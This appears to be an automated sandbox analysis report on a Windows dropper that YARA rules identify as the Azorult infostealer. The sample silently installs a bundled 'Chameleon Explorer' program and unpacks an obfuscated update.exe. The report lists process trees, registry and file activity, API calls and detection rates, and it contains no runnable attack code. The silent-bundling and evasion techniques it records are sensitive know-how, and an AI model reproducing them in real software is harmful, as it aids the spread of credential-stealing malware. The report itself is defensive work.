Source: 8.2.update.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 8.3.update.exe.460000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 8.3.update.exe.460000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000008.00000002.318255606.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000008.00000003.308603193.0000000000460000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		6_2_0040E538
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		7_2_004B00AC

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: String function: 00404C88 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 004ADAE0 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 00487C88 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 00409620 appears 156 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 00405A34 appears 203 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 0049EE30 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 004B2E4C appears 74 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 00406914 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 0040E258 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 0049EB4C appears 38 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 00406438 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 00406448 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 0040C24C appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: String function: 004B2BC8 appears 119 times
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: String function: 00403BF4 appears 46 times
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: String function: 004062FC appears 42 times
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: String function: 00404E98 appears 86 times
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: String function: 00404EC0 appears 33 times
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: String function: 0040300C appears 32 times
Source: C:\Users\user\AppData\Roaming\update.exe	Code function: String function: 004034E4 appears 32 times

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004808CC: CreateFileW,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

7_2_004808CC

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Static PE information: Resource name: RT_GROUP_ICON type: 64-bit XCOFF executable or object module
Source: cexplorer.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cexplorer.tmp.6.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-VD36P.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-VD36P.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.316152471.000000000197D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameh vs 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.316152471.000000000197D000.00000004.00000001.sdmp	Binary or memory string: FV_ORIGINALFILENAME vs 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.311325328.0000000004156000.00000004.00000001.sdmp	Binary or memory string: Comments\|CompanyName\|FileDescription\|FileVersion\|InternalName\|LegalCopyright\|LegalTrademarks\|OriginalFilename\|ProductName\|ProductVersion\|PrivateBuild\|SpecialBuild++ vs 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, 00000001.00000003.311325328.0000000004156000.00000004.00000001.sdmp	Binary or memory string: ents\|CompanyName\|FileDescription\|FileVersion\|InternalName\|LegalCopyright\|LegalTrademarks\|OriginalFilename\|ProductName\|ProductVersion\|PrivateBuild\|SpecialBuild vs 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Source: update.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

File created: C:\Users\user\AppData\Roaming\cexplorer.exe

Jump to behavior

Source: classification engine

Classification label: mal100.spyw.evad.winEXE@27/42@6/4

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004328A4 GetLastError,FormatMessageW,

7_2_004328A4

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Roaming\cexplorer.exe

Code function: 6_2_0040EE14 FindResourceW,SizeofResource,LoadResource,LockResource,

6_2_0040EE14

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

File created: C:\Program Files (x86)\Chameleon Explorer

Jump to behavior

Source: ChameleonExplorer.exe, 00000009.00000002.338402905.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000C.00000002.348963061.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 0000000F.00000002.381255474.0000000000429000.00000020.00020000.sdmp, ChameleonExplorer.exe, 00000012.00000000.376549590.0000000000429000.00000020.00020000.sdmp

Binary or memory string: .csproj

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Virustotal: Detection: 72%
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Metadefender: Detection: 34%
Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	ReversingLabs: Detection: 67%

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe "C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe"
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Process created: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 590118
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Process created: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 590118	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040E538 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		6_2_0040E538
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Code function: 7_2_004B00AC GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,		7_2_004B00AC

Source: C:\Users\user\AppData\Roaming\cexplorer.exe

File created: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Code function: 7_2_004CC238 GetVersion,CoCreateInstance,

7_2_004CC238

Source: C:\Users\user\AppData\Roaming\cexplorer.exe

Code function: 6_2_0040805C GetDiskFreeSpaceW,

6_2_0040805C

Source: C:\Users\user\AppData\Roaming\update.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-F48865A5-C9999EE40
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe	Mutant created: \Sessions\1\BaseNamedObjects\ChameleonFolderMiddleClick

Source: cexplorer.exe

String found in binary or memory: rting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked the co

Source: Yara match	File source: 00000007.00000003.389900078.00000000051B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Chameleon Explorer\is-NOOMK.tmp, type: DROPPED

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\cexplorer.exe
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: unknown	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	Process created: C:\Users\user\AppData\Roaming\cexplorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp	Process created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\update.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\update.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\update.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

Window found: window name: TMainForm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\update.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Static file information: File size 7666176 > 1048576

Source: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x748a00

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Roaming\update.exe

Unpacked PE file: 8.2.update.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;

Obfuscated command line found

Show sources

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Process created: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Process created: C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-M92GB.tmp\cexplorer.tmp" /SL5="$C025E,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-			Jump to behavior

Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040D034 push ecx; mov dword ptr [esp], eax	6_2_0040D039
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040E0D0 push 0040E118h; ret	6_2_0040E110
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_004100D8 push 00410140h; ret	6_2_00410138
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00406944 push 00406986h; ret	6_2_0040697E
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040B104 push 0040B2B0h; ret	6_2_0040B2A8
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00406A50 push 00406A88h; ret	6_2_00406A80
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_0040E250 push 0040E27Ch; ret	6_2_0040E274
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00406A92 push 00406AC0h; ret	6_2_00406AB8
Source: C:\Users\user\AppData\Roaming\cexplorer.exe	Code function: 6_2_00406A94 push 00406AC0h; ret	6_2_00406AB8
